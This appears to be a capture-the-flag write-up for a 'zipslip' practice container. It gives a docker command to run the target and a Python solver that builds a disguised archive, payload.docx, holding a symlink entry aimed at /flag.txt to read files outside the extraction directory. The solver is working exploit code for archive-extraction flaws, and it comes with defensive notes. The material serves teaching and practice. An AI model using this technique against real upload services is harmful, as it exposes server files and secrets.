image.png

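Want to run this container locally? The command below publishes port 9006 on every host interface and restarts the container automatically; since this is a practice target, consider binding it to loopback instead (`-p 127.0.0.1:9006:9006`) and removing it when you are done.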

docker run -d --restart unless-stopped -p 9006:9006 --name zipslip joshbeck2024/zipslip:latest

I would encourage you to read this lesson over.

Solver.py

import zipfile
import stat

def create_symlink_zip(zip_filename, link_name, target):
    """Write a zip archive holding one entry that is flagged as a Unix symlink.

    The entry is named *link_name* and its stored data is the *target*
    path, which is how the zip format records a symbolic link's destination.

    Args:
        zip_filename: Path (or writable file object) for the archive.
        link_name: Name of the entry inside the archive.
        target: Path the link points to, stored as the entry's data.

    Defensive note: whether the link is recreated on disk depends on the
    extractor. Code that unpacks untrusted archives should inspect each
    entry's mode (``stat.S_ISLNK(info.external_attr >> 16)``) and refuse
    or flatten links, and should confirm that every resolved output path
    stays inside the extraction directory.
    """
    unix_host = 3  # "created by" host code for Unix
    # File type S_IFLNK (0o120000) combined with permission bits 0o777.
    link_mode = stat.S_IFLNK | 0o777

    entry = zipfile.ZipInfo(link_name)
    entry.create_system = unix_host
    # The Unix mode lives in the upper 16 bits of external_attr.
    entry.external_attr = link_mode << 16

    with zipfile.ZipFile(zip_filename, 'w') as archive:
        archive.writestr(entry, target)

if __name__ == "__main__":
    # Script entry: build the sample archive used in this write-up.
    create_symlink_zip(
        zip_filename="payload.docx",
        link_name="link_to_flag.txt",
        target="/flag.txt",
    )
    print("Created payload.docx")